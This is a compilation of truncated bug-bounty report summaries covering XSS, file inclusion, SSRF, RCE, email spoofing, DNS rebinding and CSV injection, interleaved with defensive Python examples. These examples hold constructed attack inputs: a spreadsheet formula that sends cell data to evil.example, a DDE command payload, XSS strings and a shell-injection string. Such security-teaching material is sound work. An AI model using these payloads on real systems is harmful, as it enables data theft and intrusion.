MTN Group: Firebase Database Takeover in https://pulseradio.mtn.co.ug/
Summary: During my test, in one of the subdomains of mtn.co.ug I found the Firebase configuration disclosed in the source code along with the apiKey and database URL. Exploiting this vulnerability, an attacker is able to upload malicious data to the Firebase account of pulseradio.mtn.co.ug and see database...
FetLife: Stored XSS via Angular Expression injection via Subject while starting a conversation with other users.
The reporter pointed out that the Subject field for sending private messages using FetLife's onsite chat was vulnerable to a stored XSS exploit, allowing people to execute potentially malicious content on the receiving end of the message...
HackerOne: Blind Stored XSS in HackerOne's Sal 4.1.4.2149 (sal.████.com)
The page located at https://sal.██████.com/list/Activity/hour/all/0/ suffers from a Cross-site Scripting XSS vulnerability when a user has set their hostname on their machine to an XSS payload. Vulnerable Page https://sal.██████.com/list/Activity/hour/all/0/ Victim IP Address ███████ Referer...
GSA Bounty: Limited LFI
Summary: Due to improper parameter sanitization, local file inclusion is possible. The LFI is limited, as we were not able to truncate the end of the string. Description: The application root is located at /var/www/dashboard/new/public. Due to URL manipulation we are able to read a file from...
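The "limited" LFI above is the usual shape of the bug: a user-supplied file name is joined to the application root without checking where the normalised path ends up, and the attacker cannot truncate whatever the application appends afterwards. The following is an added example, not the GSA dashboard's code: only the root path is taken from the report, and the parameter values are constructed. It shows the unchecked join beside a confinement check that rejects traversal, absolute paths and the NUL byte used for truncation attempts.

```python
"""Confining a user-supplied file name to the application root. Added example,
not the GSA dashboard's code: only the root path is taken from the report;
the file names below are constructed."""
import posixpath

APP_ROOT = "/var/www/dashboard/new/public"  # quoted from the report


def resolve_vulnerable(user_path, root=APP_ROOT):
    """Concatenation with no check: '../' segments walk out of the root.
    Returns the path the server would open."""
    return posixpath.normpath(root + "/" + user_path)


def resolve_safe(user_path, root=APP_ROOT):
    """Reject NUL bytes (used to truncate an appended extension), absolute
    paths, and anything whose normalised form leaves the root."""
    if "\x00" in user_path or user_path.startswith("/"):
        raise ValueError("rejected: absolute path or NUL byte")
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("rejected: path escapes the application root")
    return candidate


def is_confined(user_path, root=APP_ROOT):
    """Convenience wrapper: True if resolve_safe accepts the path."""
    try:
        resolve_safe(user_path, root)
        return True
    except ValueError:
        return False
```

posixpath.normpath is purely lexical; on a live filesystem the same check should be repeated on os.path.realpath so that symlinks inside the root cannot point outside it.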
Algolia: subdomain takeover at recommendation.algolia.com
Description: Hello sir, the CNAME of your subdomain recommendation.algolia.com is recommendation.us, and recommendation.us is for sale, which can lead to subdomain takeover. Steps to reproduce: 1. Check the CNAME of recommendation.algolia.com 2. See that the CNAME "recommendation.us" is for sale using looku...
Mail.ru: RCE on shared.mail.ru due to "widget" plugin
Confluence widget connector vulnerable to CVE-2019-3396 was available on shared.mail.ru...
Django: Email Spoofing Possible on djangoproject.com Email Domain
Summary: Due to the lack of SPF and DMARC records it is possible to spoof emails from djangoproject.com. This could potentially be used to trick employees, customers or clients via phishing emails. Description: Mail servers rely on both SPF and DMARC to properly deal with email spoofing. SPF shows...
Semrush: Remote Code Execution on www.semrush.com/my_reports on Logo upload
The Logo upload in the report constructor at https://www.semrush.com/myreports/constructor F340480 is passed through an improperly patched version of ImageMagick. You can use PostScript to get Ghostscript to run, which in turn allows triggering arbitrary commands on the server, leading to Remo...
Zomato: [Zomato Android/iOS] Theft of user session
Hi, I'd like to report a bug which allows theft of user data even without installing third-party apps. The Activity XML is exported and can be accessed by a browser. When any WebView in a client app, or a browser, meets a zomato://etc URL it will automatically launch the Zomato app. File...
Semrush: Email Spoofing
Hey SemRush, It appears that spoofed email can be sent from one of your email addresses. The following email is vulnerable: [email protected] Information: Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source...
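The djangoproject.com and Semrush spoofing reports above rest on the same point: unless the domain publishes an SPF record that ends in a hard fail and a DMARC policy that enforces it, a receiving server has no basis for rejecting a forged From: address. The block below is an added example, not code from either report or from HackerOne: it evaluates a domain's SPF and DMARC posture from TXT records. The records, domain names and the lookup function are constructed stand-ins for real DNS answers so it runs offline.

```python
"""Offline SPF/DMARC posture check. Added example; the TXT answers below are
constructed and the lookup function stands in for a real DNS query."""
import re

# Constructed TXT answers keyed by the name that would be queried.
CONSTRUCTED_TXT = {
    "good.example": ["v=spf1 include:_spf.example.net -all"],
    "_dmarc.good.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@good.example"],
    "soft.example": ["v=spf1 ip4:192.0.2.0/24 ~all"],
    "_dmarc.soft.example": ["v=DMARC1; p=none"],
    "bare.example": [],  # no SPF record, and no _dmarc.bare.example either
}


def lookup_txt(name, txt=CONSTRUCTED_TXT):
    """Stand-in for a TXT query; returns the list of records for the name."""
    return txt.get(name, [])


def parse_spf(records):
    """Return {'raw', 'all'} for the single v=spf1 record, or None.
    Zero or several SPF records both count as 'no SPF' for a receiver."""
    spf = [r for r in records if r.lower().startswith("v=spf1")]
    if len(spf) != 1:
        return None
    all_qualifier = "?"  # implicit neutral when no 'all' mechanism is present
    for term in spf[0].split()[1:]:
        m = re.fullmatch(r"([+\-~?]?)all", term, re.I)
        if m:
            all_qualifier = m.group(1) or "+"
    return {"raw": spf[0], "all": all_qualifier}


def parse_dmarc(records):
    """Return the tag=value pairs of the single v=DMARC1 record, or None."""
    rec = [r for r in records if r.lower().startswith("v=dmarc1")]
    if len(rec) != 1:
        return None
    tags = {}
    for part in rec[0].split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess(domain, txt=CONSTRUCTED_TXT):
    """Collect the reasons a forged From: <anything>@domain would be accepted."""
    spf = parse_spf(lookup_txt(domain, txt))
    dmarc = parse_dmarc(lookup_txt("_dmarc." + domain, txt))
    findings = []
    if spf is None:
        findings.append("no SPF record: any host may claim to send for this domain")
    elif spf["all"] in ("+", "?"):
        findings.append("SPF ends in %sall: unauthorized senders are not rejected" % spf["all"])
    elif spf["all"] == "~":
        findings.append("SPF uses ~all (softfail): receivers usually only tag, not reject")
    if dmarc is None:
        findings.append("no DMARC record: SPF/DKIM results are not tied to the From: header")
    elif dmarc.get("p", "none").lower() == "none":
        findings.append("DMARC p=none: spoofed mail is reported but still delivered")
    return {"spoofable": bool(findings), "findings": findings}
```

A domain passes only when SPF ends in -all and DMARC is at least p=quarantine; SPF alone, even with -all, does not protect the visible From: header, which is why both reports name DMARC as well.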
Palantir Public: SQL Injection at https://files.palantir.com/ due to CVE-2021-38159
A vulnerability was discovered in an Internet-facing asset files.palantir.com. A proof of concept POC was developed and used to validate the finding. The vulnerability was patched and resolved. Blog about this vulnerability published. You can read full detail here:...
Ruby: imap: StartTLS stripping attack (CVE-2016-0772).
net/imap does not seem to raise an exception when the remote IMAP server fails to respond with a tagged response (NO/BAD or OK) to an explicit call of imap.starttls. This may allow a malicious MITM to perform a STARTTLS stripping attack if the client code does not explicitly set usessl = true on...
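The net/imap issue above is the general STARTTLS-stripping pattern: a client that does not insist on a tagged OK for its own STARTTLS command can be held on plaintext by an attacker who answers NO, BAD, or nothing at all. The added example below is Python, not Ruby's net/imap and not the reporter's code; it models the client-side decision, with constructed server replies standing in for the socket.

```python
"""Client-side handling of the IMAP STARTTLS reply. Added example, not Ruby's
net/imap; the server replies below are constructed byte strings."""
import re

# "<tag> OK|NO|BAD ..." is the only line that answers our command.
TAGGED = re.compile(rb"^([A-Za-z0-9]+) (OK|NO|BAD)\b")


def starttls_granted(tag, reply_lines):
    """True only if the server answered '<tag> STARTTLS' with '<tag> OK'.
    Untagged lines ('* ...') are skipped, since a real server may interleave
    them. NO, BAD, a reply for another tag, or no reply at all means the
    session must not be treated as encrypted."""
    for line in reply_lines:
        if line.startswith(b"*"):
            continue
        m = TAGGED.match(line)
        if not m or m.group(1) != tag.encode():
            continue
        return m.group(2) == b"OK"
    return False  # no tagged response at all (the MITM dropped it)


def negotiate(tag, reply_lines, require_tls=True):
    """What the client does after sending '<tag> STARTTLS':
    'tls'       - wrap the socket and continue,
    'abort'     - refuse to continue without encryption,
    'plaintext' - the unsafe behaviour from the report: failure not raised,
                  so the session silently continues unencrypted."""
    if starttls_granted(tag, reply_lines):
        return "tls"
    return "abort" if require_tls else "plaintext"


# Constructed server replies to "A001 STARTTLS".
HONEST = [b"* OK IMAP4rev1 ready", b"A001 OK Begin TLS negotiation now"]
STRIPPED_NO = [b"A001 NO STARTTLS not supported"]  # refusal injected by a MITM
STRIPPED_SILENT = []                                # MITM drops the reply entirely
WRONG_TAG = [b"A000 OK earlier command completed"]  # reply to a different command
```

The point of the model is the require_tls branch: a client that merely "tries" STARTTLS and carries on when it is not granted gives the attacker a downgrade for free, which is why a failed STARTTLS must raise rather than return.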
Open-Xchange: Null dereference or redundant null check in `mail_crypt_load_global_private_key` for plugin mail-crypt
In this function, we check once if error_r is not NULL: if (enctype == DCRYPT_KEY_ENCRYPTION_TYPE_PASSWORD) { /* Fail here if password is not set since openssl will prompt for it otherwise */ if (key_password == NULL) { if (error_r != NULL) *error_r = t_strdup_printf("%s: %s unset, no " "password to decrypt the key", ...
Node.js third-party modules: [Uppy] Internal Server side request forgery (bypass of #786956)
I would like to report an internal server-side request forgery in Uppy. It allows the attacker to easily extract information from internal servers. Module: module name: Uppy, version: 1.15.0, npm page: https://www.npmjs.com/package/uppy Module Description: Uppy is a sleek, modular JavaScript file uploader...
Shopify: CSRF on connecting Paypal as Payment Provider
Hi, I think there is weak CSRF protection on adding PayPal as the payment provider; the protection is not good. When a user tries to add PayPal as payment provider, they make this GET request...
Mail.ru: [icq.im] Reflected XSS via chat invite link
Insufficient filtering in icq.im allowed reflected XSS via invite link...
h1-ctf: [h1-415 2020] My writeup on how to retrieve the special secret document
Summary: An attacker without any privilege is able to retrieve the special secret document, hosted on the https://h1-415.h1ctf.com website. To do so, multiple steps are required : 1. The authentication must be bypassed to have a licensed account; 2. The support team portal is vulnerable to a blin...
Internet Bug Bounty: CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host
description here: https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html PoC: https://github.com/q3k/cve-2019-5736-poc Some more links: https://seclists.org/oss-sec/2019/q1/119 https://access.redhat.com/security/cve/cve-2019-5736 Impact It allows to escape from container t...
AlienVault: Public .htaccess/.htpasswd/.canvas files lead to password disclosure.
I am a big fan of fuzzing/bruteforcing. After my last submission 288533 on http://data.alienvault.com, I decided to go further. After some bruteforcing I came across this directory, which looked kind of interesting to me: http://data.alienvault.com/snort/ When you try to access the directory you will ge...
Gratipay: Possible User Session Hijack using Invalid HTTPS certificate on inside.gratipay.com domain
Good evening team! This is a theoretical risk but I thought it was still worth reporting since every endpoint and any data flowing through inside.gratipay.com is unencrypted. POC https://inside.gratipay.com And every sub directory under inside.gratipay.com. Description Since the certificate is on...
ExpressionEngine: Type Juggling -> PHP Object Injection -> SQL Injection Chain
Justin Kennedy identified a Type Juggling vulnerability in ExpressionEngine that allowed access to unserialize using user supplied data, ultimately achieving SQL Injection. The full details of this vulnerability can be found here:...
LocalTapiola: Remote Code Execution in NovaStor NovaBACKUP DataCenter backup software (Hiback)
Issue This report contains information about a vulnerability in NovaStor NovaBACKUP DataCenter backup software. Fix There is no immediate fix. LähiTapiola has internal network controls in place for mitigation. Reasoning The report is partially out of scope as the software in question is not...
Omise: The endpoint '/test/webhooks' is vulnerable to DNS Rebinding
Summary: DNS rebinding attack is a method of switching the resolution of domain names as wished by the attacker. The aim is to lure the web app to a different IP address/host. In this attack, and particularly in our case, a malicious server will first perform a domain name resolution to the IP...
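The rebinding described above works because the webhook endpoint validates the name and then connects to the name, and the two resolutions can return different addresses. The block below is an added example, not Omise's code: it scripts a resolver whose answer for the attacker's host changes between the validation lookup and the connect lookup, and contrasts check-then-connect delivery with a pinned one. All hostnames and addresses are constructed.

```python
"""DNS rebinding against an outbound webhook fetch. Added example, not Omise's
code: the resolver is a scripted stand-in and every name and address is
constructed."""
import ipaddress
from collections import deque


class RebindingResolver:
    """Returns scripted answers; the last answer repeats once the script is used up."""

    def __init__(self, script):
        self.script = {name: deque(ips) for name, ips in script.items()}

    def resolve(self, host):
        answers = self.script[host]
        return answers[0] if len(answers) == 1 else answers.popleft()


def is_public(ip_str):
    """Reject private, loopback, link-local, reserved and multicast targets."""
    ip = ipaddress.ip_address(ip_str)
    return ip.is_global and not ip.is_multicast


def deliver_naive(host, resolver):
    """Vulnerable shape: validate one resolution, then hand the *name* to the
    HTTP client, which resolves again (a short TTL makes the second answer
    differ). Returns the address that actually gets connected to."""
    if not is_public(resolver.resolve(host)):
        raise ValueError("refusing non-public target")
    return resolver.resolve(host)


def deliver_pinned(host, resolver):
    """Hardened shape: resolve once, validate that address, connect to it, and
    use the name only for the Host header and TLS SNI. Any redirect target must
    go through the same check."""
    ip = resolver.resolve(host)
    if not is_public(ip):
        raise ValueError("refusing non-public target")
    return ip


# Constructed script: a public address for the check, the cloud metadata
# address for the connection that follows.
SCRIPT = {
    "hook.attacker.example": ["8.8.8.8", "169.254.169.254"],
    "hook.customer.example": ["1.1.1.1"],
}
```

Pinning the validated address is what defeats rebinding; filtering the first answer alone only defeats the attacker who is careless enough to put the internal address in the record from the start.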
XVIDEOS: Script breaking tag (Forces website to render blank) (Informative)
Summary: This is a bug affecting core HTML and JS elements on the site via Search Steps To Reproduce: 1. Open https://www.xvideos.com 2. Click to search enter payload= "" without quotes 3. Hit enter or search, watch the page break and not load any content content is loaded in console, renders pag...
GitHub Security Lab: [Python]: Add SqlAlchemy support for SQL injection query
This bug was reported directly to GitHub Security Lab...
Node.js: Built-in TLS module unexpectedly treats "rejectUnauthorized: undefined" as "rejectUnauthorized: false", disabling all certificate validation
NOTE! Thanks for submitting a report! Please replace all the square sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report! Summary: "rejectUnauthorized: false"...
curl: Inadequate Cryptographic Key Size and Insecure Cryptographic Mode. File Name :- curl_ntlm_core.c
The application is generating cryptographic keys or key pairs using a short and inadequate length. This application is using the ECB (Electronic Codebook) mode of operation to perform encryption, which is considered semantically insecure. Vulnerable file name: curl_ntlm_core.c Vulnerable line no. 2...
U.S. Dept Of Defense: Reflected XSS in https://www.█████/
Hello Security Team, I would like to report an XSS vulnerability on your system. Steps To Reproduce: Visit the following POC link and move your mouse all over the index page: https://www.████/Z%22onmouseover=alert%60%60%20%22/████████/█████.aspx 1. Tested on Firefox browser: ███████ 2. Tested on Googl...
Khan Academy: CSV Injection Via Student Password/Name Leads To Client Side RCE And Reading Client Files
Insufficient CSV escaping could result in our site generating an unsafe CSV file for an end user under certain conditions. See the reporter's summary for more. Two CSV injection issues were discovered in Khan's teacher CSV export function, which could allow client-side remote code execution and...
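The export above is dangerous because a student name or password beginning with a formula character is stored verbatim, so the teacher's spreadsheet evaluates it on open. The added example below is not Khan Academy's export code: it writes the same kind of rows with and without neutralisation and checks which version still contains a cell a spreadsheet would execute. The row data is constructed.

```python
"""Formula (CSV) injection in an export. Added example, not Khan Academy's
code; the student rows are constructed."""
import csv
import io

# Leading characters that make Excel, LibreOffice and Sheets evaluate a cell.
FORMULA_LEADERS = ("=", "+", "-", "@", "\t", "\r")


def neutralise(value):
    """Prefix an apostrophe so the cell is stored as text. The check ignores
    leading spaces because '  =1+1' is still evaluated once the spreadsheet
    trims it; the original text is kept intact after the mark."""
    s = str(value)
    if s.lstrip(" ").startswith(FORMULA_LEADERS):
        return "'" + s
    return s


def export_rows(rows, safe=True):
    """Render (name, password) pairs as CSV. safe=False reproduces the
    vulnerable export that writes user-controlled text verbatim."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["name", "password"])
    for name, password in rows:
        if safe:
            name, password = neutralise(name), neutralise(password)
        writer.writerow([name, password])
    return buf.getvalue()


def parsed(csv_text):
    """Parse CSV text back into a list of rows, header first."""
    return list(csv.reader(io.StringIO(csv_text)))


def has_formula_cell(csv_text):
    """True if any data cell would be evaluated as a formula when opened."""
    return any(cell.startswith(FORMULA_LEADERS)
               for row in parsed(csv_text)[1:] for cell in row)


# Constructed student records; two carry payloads a spreadsheet would run.
ROWS = [
    ("alice", "hunter2"),
    ('=HYPERLINK("http://evil.example/?"&A1,"click")', "x"),
    ("bob", "=cmd|' /C calc'!A0"),
    ("carol", "  -2+3"),
]
```

The '-' rule also marks negative numbers, so genuinely numeric columns need to be typed and emitted separately rather than passed through neutralise; and because the export merely reflects stored data, the same characters should be refused or flagged at the point where names and passwords are set.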
Starbucks: Default credentials for the temporary POC site alipoc.stg.starbucks.com.cn permitted WAF bypass and RCE
neweq discovered that a temporary proof of concept site alipoc.stg.starbucks.com.cn was initially configured with default credentials for a brief period of time before being taken offline. @neweq — thank you for reporting this vulnerability and for confirming the resolution...
Staging.every.org: Flaw in Change Email https://youtu.be/MMvlcHIGs2A
See https://youtu.be/MMvlcHIGs2A...
Monero: Exploiting Network and Timing Side-Channels to Break Monero Receiver Anonymity
Summary: We present various examples of side-channel leakage in the communication between a Monero wallet and P2P node. Communication patterns and timing leak whether the wallet is the payee of a transaction that is sent into the transaction pool or mined in a block—thereby breaking transaction...
Grab: Leaking sensitive information on GitHub leads to full access to all Grab Slack channels
Summary: Accidental leakage of secret keys in such code repositories is a real problem. After my report 387117, I decided to dig deeper than the previous report, and by looking at some random profiles on GitHub and doing some dirty work I was able to access the developer's company's internal chat...
U.S. Dept Of Defense: SOAP WSDL Parser SQL Code Execution
Summary: SOAP WSDL Parser SQL Code Execution Description: It was possible to parse WSDL resources and read all functions from the SOAP Admin Panel; therefore I was able to repeat the SQL query with a tampered request containing my own custom SQL command. I was able to extract all the database names for...
Semrush: Reflected XSS using Header Injection
Host: www.semrush.com Path: /billing-admin/profile/subscription/?l=de Payload: c5obc'+alert(1)+'p7yd5 Steps to reproduce: Request Header: GET /billing-admin/profile/subscription/?l=de HTTP/1.1 Host: www.semrush.com Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0;...
Informatica: [oneclickdrsfdc-test.informatica.com] Tomcat Example Scripts Exposed Unauthenticated
Issue The consultant identified that there is an unauthenticated installation of Apache Tomcat on the affected host. This particular installation has the /examples directory exposed, which contains several scripts that execute server-side code; these scripts can also be leveraged to carr...
Mars: CVE-2022-21371: Oracle WebLogic Server Local File Inclusion
A vulnerability was identified in Oracle WebLogic Server's Web Container component. Affected versions included ██████████, ██████████, ██████████, and ██████████. The vulnerability could be exploited by an unauthenticated attacker over HTTP, potentially leading to unauthorized access to critical...
Internet Bug Bounty: CVE-2023-28319: UAF in SSH sha256 fingerprint check
A use-after-free vulnerability was found in libcurl's SSH server public key verification feature, affecting versions 7.81.0 to 8.0.1. When the verification check failed, libcurl would free the memory for the fingerprint before returning an error message containing the now-freed hash, potentially...
curl: CVE-2023-28321: IDN wildcard match
An improper validation of a certificate with host mismatch vulnerability was found in curl/libcurl, which allowed an attacker to perform a man-in-the-middle attack. The vulnerability was caused by the use of wildcards for validation during TLS communication, even if the hostname is an IDN. This...
Internet Bug Bounty: CVE-2022-40127: RCE in Apache Airflow <2.4.0 bash example
airflow-2.3.3/airflow/example_dags/example_bash_operator.py has a command injection vulnerability. I can control the run_id in the following code (example_bash_operator.py), so I can inject custom commands. also_run_this = BashOperator(task_id='also_run_this', bash_command='echo "run_id={{ run_id }} | dag_run={{ dag_run }}"'...
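The injection above comes from rendering a user-controlled value into the text of a shell command before the shell parses it. The block below is an added example that reproduces that pattern in plain Python without Airflow: the template substitution is a str.replace stand-in for Jinja, the payload is constructed, and the hardened variant passes the value through the environment instead of the command string (BashOperator's own env argument offers the same route).

```python
"""Command injection through a templated shell command, modelled without
Airflow. Added example: str.replace stands in for Jinja rendering and the
payload is constructed."""
import subprocess


def run_vulnerable(run_id):
    """The attacker-controlled run_id is spliced into the command text before
    /bin/sh parses it, so a double quote inside it ends the echo argument."""
    cmd = 'echo "run_id={{ run_id }}"'.replace("{{ run_id }}", run_id)
    return subprocess.run(["/bin/sh", "-c", cmd],
                          capture_output=True, text=True).stdout


def run_hardened(run_id):
    """The command text is a constant; the value reaches the shell only as an
    environment variable, which "$RUN_ID" expands without re-parsing."""
    cmd = 'echo "run_id=$RUN_ID"'
    env = {"PATH": "/usr/bin:/bin", "RUN_ID": run_id}
    return subprocess.run(["/bin/sh", "-c", cmd],
                          capture_output=True, text=True, env=env).stdout


# Constructed payload: closes the quoted string, runs a command, reopens it.
PAYLOAD = 'x"; echo INJECTED; echo "'
```

With the payload, the vulnerable variant prints INJECTED on its own line, while the hardened variant prints the payload back as one literal value.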
Sifchain: SSH server due to Improper Signature Verification
I found that you are using golang.org/x/[email protected], which has a vulnerability that was fixed in this version golang.org/x/[email protected]. The vulnerability is: golang.org/x/crypto/ssh is an SSH client and server Version...
Nextcloud: Webauthn tokens are not removed on user deletion
1. userA has an account on serverA 2. userA enables passwordless login (webauthn) and registers a key/device 3. userA is removed from the system 4. a new user comes along and gets assigned userA as id 5. the old userA tries to login with their key 6. the old userA can see all data of the new userA...
GitHub Security Lab: Java: CWE-749 Unsafe resource loading in Android WebView leaking to injection attacks
This bug was reported directly to GitHub Security Lab...
Mail.ru: Bypass OTP on contact back request at https://driver.city-mobil.ru/
It was possible to bypass phone verification for support call back request...
U.S. Dept Of Defense: RCE on https://█████/ Using CVE-2017-9248
Summary: https://█████████/ is hosting an unpatched version of the Telerik DialogHandler Telerik.Web.UI.DialogHandler.aspx allowing for the machine key to be brute forced. The machine key can be used to access the DNN file manager to upload arbitrary files including ASPX giving a web shell and RC...
Internet Bug Bounty: Improper handling of Chunked data request in sapi_apache2.c leads to Reflected XSS
Hey, Chunked requests can trigger XSS and HTML injection at any endpoint because the APR_BRIGADE_INSERT_TAIL(brigade, bucket) is getting destroyed by other handlers. Affected versions: Any OS: Any https://bugs.php.net/bug.php?id=76 Prashanths-MacBook-Pro: prashanthvarma$ nc localhost 80 POST /lol.php...
Node.js third-party modules: [markdown-pdf] Local file reading
I would like to report local file reading in markdown-pdf. It allows inserting malicious HTML code, which allows reading local files. Module: module name: markdown-pdf, version: 8.1.1, npm page: https://www.npmjs.com/package/markdown-pdf Module Description: Node module that converts Markdown fil...
Internet Bug Bounty: Linux kernel: CVE-2017-6074: DCCP double-free vulnerability
Hi! CVE-2017-6074 [1] is a double-free vulnerability I found in the Linux kernel. It can be exploited to gain kernel code execution from an unprivileged process. The kernel needs to be built with CONFIG_IP_DCCP for the vulnerability to be present. A lot of modern distributions enable this option by...
HackerOne: Invitation token leaks to https://bat.bing.com
Summary Invitation page contains iframes that points to https://b5s.hackerone-ext-content.com/!/invitations/ and https://a4l.hackerone-ext-content.com/!/invitations/. A GET request to these endpoints executes a script that points to https://bat.bing.com/bat.js. The corresponding request to bing...
Gratipay: clickjacking on https://gratipay.com/on/npm/[text]
Hi team, I found a clickjacking URL at https://gratipay.com/on/npm/here. This clickjacking must be 3 characters and must be 5 numbers entered at the endpoint of the URL. Please fix soon. https://gratipay.com/on/npm/text Steps to reproduce: 1. Go to https://gratipay.com/on/npm/text 2. Check name or number...